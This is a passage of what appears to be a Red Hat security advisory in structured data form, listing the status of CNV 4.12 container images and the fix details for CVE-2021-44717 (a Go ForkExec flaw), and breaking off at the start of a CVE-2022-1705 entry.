"8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2030806", }, ], notes: [ { category: "description", text: "There's a flaw in golang's syscall.ForkExec() interface. An attacker who manages to first cause a file descriptor exhaustion for the process, then cause syscall.ForkExec() to be called repeatedly, could compromise data integrity and/or confidentiality in a somewhat uncontrolled way in programs linked with and using syscall.ForkExec().", title: "Vulnerability description", }, { category: "summary", text: "golang: syscall: don't close fd 0 on ForkExec error", title: "Vulnerability summary", }, { category: "other", text: "* This flaw has had the severity level set to Moderate due to the attack complexity required to exhaust file descriptors at the time ForkExec is called, plus an attacker does not necessarily have direct control over where/how data is leaked.\n\n* For Service Telemetry Framework, because the flaw's impact is lower, no update will be provided at this time for its containers.\n\n* runc shipped with Red Hat Enterprise Linux 8 and 9 are not affected by this flaw because the flaw is already patched in the shipped versions.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-44717", }, { category: "external", summary: "RHBZ#2030806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030806", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-44717", url: "https://www.cve.org/CVERecord?id=CVE-2021-44717", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-44717", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44717", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", url: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, ], release_date: "2021-12-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, { category: "workaround", details: "This bug can be mitigated by raising the per-process file descriptor limit.", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 4.8, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: syscall: don't close fd 0 on ForkExec error", }, { cve: "CVE-2022-1705", cwe: { id: "CWE-444", name: "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", 